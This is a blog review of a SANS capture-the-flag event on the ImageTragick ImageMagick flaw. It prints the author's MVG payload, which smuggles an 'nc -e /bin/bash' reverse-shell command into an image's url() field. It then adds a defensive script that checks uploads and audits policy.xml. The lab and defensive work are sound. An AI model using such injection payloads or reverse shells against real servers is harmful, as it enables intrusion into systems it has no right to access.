One-Hour CtF review

A colleague of mine who is very involved with SANS sent me an invitation last week for a new event called ‘One-Hour CtF’. The event, hosted by Ed Skoudis and the team that puts together SANS NetWars and the Holiday Hack Challenge, was invite-only and capped at 100 people, so I felt special. The premise is simple: once per quarter the team will hold a lunchtime CTF event that starts with a discussion of a relevant topic, then turns the participants loose for 40 minutes to capture one or more flags, and ends with a discussion of the solution and notification of the winners.

https://www.onehourctf.com/

The first event dealt with the recent ImageMagick exploit(s) (http://imagetragick.com/). The presenters did a great quick walk-through of the vulnerability and provided some slides with additional info. One of the best parts of this event was that you do not need to spin up a VM and can participate from any PC that has a web browser. Once logged in to the site, each participant is given their own Docker image based on Avocado, with console access to an attacking machine as well as browser access to the target web application.

The challenge consisted of uploading a malicious image file, catching a shell and reading out a flag. To grab a reverse shell I uploaded a file with a jpeg extension containing the following:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://blah.com/blah.png";nc -e /bin/bash 8080")'
pop graphic-context

I fired up a netcat listener and uploaded the image. Since there were so many people uploading at the same time it took a while but I eventually got a shell back and the first flag. There was a second flag which utilized another portion of the imagemagick vulnerability chained together with a misconfiguration. While I did end up obtaining both flags, I will not post the solution for the second as the organizers did not discuss it.
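The challenge above works because ImageMagick picks a coder from the file's content, not its extension, so a text file of MVG drawing directives named `.jpeg` is still handed to the MVG coder. As an added example that is not part of the original post or the organizers' material, the script below shows two checks a defender would put on the upload side: rejecting a "raster" upload whose bytes do not match its declared type (and flagging MVG/SVG directives when they appear), and auditing a `policy.xml` for the coder denials the ImageTragick advisory recommended. Function names, the constructed sample inputs, and the exact list of coders are my assumptions for illustration, not anything from the post.

```python
"""Added example (not from the original post): server-side checks for image
uploads of the kind abused in the ImageTragick challenge.  Function names,
the sample MVG text and the sample policy below are constructed."""
import re
import xml.etree.ElementTree as ET

# Magic bytes for the raster types an upload endpoint typically accepts.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# MVG/SVG drawing directives that have no business in a raster upload.
# ImageMagick sniffs content, so a ".jpg" that starts with these is handled
# by the MVG coder regardless of its extension.
MVG_MARKERS = re.compile(
    rb"(push\s+graphic-context|viewbox\s+\d|\bfill\s+'?url\(|^\s*<svg\b)",
    re.IGNORECASE | re.MULTILINE,
)


def classify_upload(data: bytes, claimed_ext: str) -> str:
    """Return 'ok' or a short rejection reason for an uploaded file."""
    ext = claimed_ext.lower().lstrip(".")
    if ext not in MAGIC:
        return "unsupported-extension"
    if not any(data.startswith(m) for m in MAGIC[ext]):
        # Content does not match the extension: the classic ImageTragick shape.
        if MVG_MARKERS.search(data[:4096]):
            return "mvg-directives-in-raster-upload"
        return "magic-mismatch"
    return "ok"


# Coders the ImageTragick advisory recommended setting to rights="none"
# (assumption: verify the list against the advisory for your version).
REQUIRED_DISABLED = {
    "EPHEMERAL", "URL", "HTTPS", "MVG", "MSL", "TEXT", "SHOW", "WIN", "PLT",
}


def missing_coder_denials(policy_xml: str) -> set:
    """Return the coders in REQUIRED_DISABLED that policy.xml does not deny."""
    root = ET.fromstring(policy_xml)
    denied = set()
    for pol in root.iter("policy"):
        if pol.get("domain") == "coder" and pol.get("rights") == "none":
            denied.add((pol.get("pattern") or "").upper())
    return REQUIRED_DISABLED - denied


# Constructed sample: MVG text with a harmless URL, saved under a .jpeg name.
SAMPLE_MVG = (
    b"push graphic-context\n"
    b"viewbox 0 0 640 480\n"
    b"fill 'url(https://example.com/x.png)'\n"
    b"pop graphic-context\n"
)

# Constructed sample policy.xml that only denies two of the coders.
SAMPLE_POLICY = """<policymap>
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="URL" />
</policymap>"""


if __name__ == "__main__":
    print(classify_upload(b"\xff\xd8\xff\xe0" + b"\x00" * 16, "jpg"))
    print(classify_upload(SAMPLE_MVG, ".jpeg"))
    print(sorted(missing_coder_denials(SAMPLE_POLICY)))
```

The magic-byte check alone would already have rejected the challenge upload; the MVG marker scan only exists to give the rejection a useful name for logging. The policy audit is the complementary control: even when an application forgets to validate, a `policy.xml` that denies the MVG, MSL, URL, HTTPS and EPHEMERAL coders stops ImageMagick from treating the text as drawing commands in the first place.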

Overall I thoroughly enjoyed the event and thought the organizers/presenters pulled it off flawlessly within the one-hour time frame, which is quite a feat (especially for a beta run).

The final scoreboard: